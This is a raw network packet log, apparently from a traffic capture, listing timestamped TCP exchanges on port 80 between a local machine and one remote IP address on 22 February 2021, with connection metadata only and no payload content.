                                                                                                                                                                Feb 22, 2021 07:45:59.889549017 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.889585018 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.889610052 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.889631987 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.889655113 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.889679909 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.889707088 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.889718056 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.889945030 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.890497923 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.890547991 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.890580893 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.890608072 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.890631914 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.890655041 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.890676975 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.890688896 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.890795946 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.891544104 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.891573906 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.891597986 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.891621113 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.891644955 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.891668081 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.891681910 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.891697884 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.891733885 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.892450094 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.892479897 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.892529011 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.892540932 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.892565966 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.892596006 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.892622948 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.892693996 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.893424988 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.893464088 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.893491983 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.893517971 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.893541098 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.893565893 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.893568993 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.893580914 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.894052982 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.894336939 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.894373894 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.894397020 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.894419909 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.894426107 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.894443989 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.894468069 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.894490957 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.894634962 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.895312071 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.895343065 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.895365953 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.895389080 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.895407915 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.895426989 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.895467997 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.895478010 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.896249056 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.896290064 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.896313906 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.896337032 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.896359921 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.896363020 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.896368027 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.896384001 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.896457911 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.896466970 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.897212029 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.897243977 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.897269011 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.897290945 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.897315025 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.897339106 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.897356033 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.897363901 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.897409916 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.898168087 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.898196936 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.898220062 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.898242950 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.898267984 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.898291111 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.898293972 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.898308039 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.899102926 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.899125099 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.899137974 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.899151087 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.899169922 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.899182081 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.899224043 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.899238110 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.899240971 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.900051117 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.900088072 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.900106907 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.900140047 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.900154114 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.900166988 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.900238037 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.900280952 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.901047945 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.901067019 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.901082993 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.901101112 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.901122093 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.901139975 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.901181936 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.901190996 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.901405096 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.901992083 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902020931 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902041912 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902060032 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902076006 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902092934 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902152061 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.902159929 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.902936935 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902955055 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902967930 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902981043 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.902993917 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.903006077 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.903347969 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.903364897 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.903886080 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.903923988 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.903948069 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.903989077 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904026985 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904042006 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.904052019 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904074907 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904077053 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.904103994 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904190063 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.904198885 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.904822111 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904855013 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904891014 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904916048 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904930115 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.904943943 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904966116 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904980898 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.904998064 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.905013084 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.905088902 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.905117035 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.905841112 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.905864000 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.905880928 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.905894041 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.905906916 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.905925035 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.905937910 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.905956984 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.905987024 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.906021118 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.906729937 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.906759977 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.906776905 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.906793118 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.906810999 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.906827927 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.906845093 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.906853914 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.906858921 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.906862020 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.906950951 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.907645941 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.907675028 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.907695055 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.907711029 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.907727957 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.907732010 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.907746077 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.907762051 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.907778978 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.907800913 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.907809019 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.907912016 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.908567905 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.908591032 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.908607960 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.908621073 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.908638000 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.908658028 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.908672094 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.908677101 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.908694029 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.908715963 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.908756018 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.909405947 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.909452915 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.909471035 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.909487009 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.909503937 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.909507990 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.909521103 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.909538031 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.909540892 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.909554005 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.909593105 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.909914970 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.910244942 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.910295010 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.910312891 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.910324097 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.910341978 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.910360098 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.910372972 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.910389900 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.910402060 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.910409927 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.910410881 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.910435915 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.911304951 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911329985 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911341906 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911362886 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911367893 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.911376953 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911390066 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911406040 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911448956 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.911613941 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.911925077 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911948919 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911971092 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.911987066 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912000895 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.912008047 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912029028 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912045956 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.912053108 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912075996 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912091017 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912107944 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912142992 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.912147045 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.912394047 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.912889004 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912919044 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912936926 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912956953 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912978888 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.912992954 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.913001060 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913022041 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913044930 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913045883 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.913068056 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913069963 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.913089991 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913165092 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.913170099 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.913836956 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913860083 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913881063 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913897991 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913918018 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913942099 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913965940 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913986921 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.913991928 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.913999081 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.914011002 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914037943 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914089918 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.914338112 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.914797068 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914833069 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914850950 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914868116 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914882898 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914900064 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914915085 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914922953 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.914928913 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.914937973 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914954901 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914967060 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.914995909 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.915081024 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.915103912 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.915642977 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.915689945 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.915710926 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.915736914 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.915736914 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.915754080 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.915769100 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.915788889 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.915806055 CET8049723104.21.71.230192.168.2.5
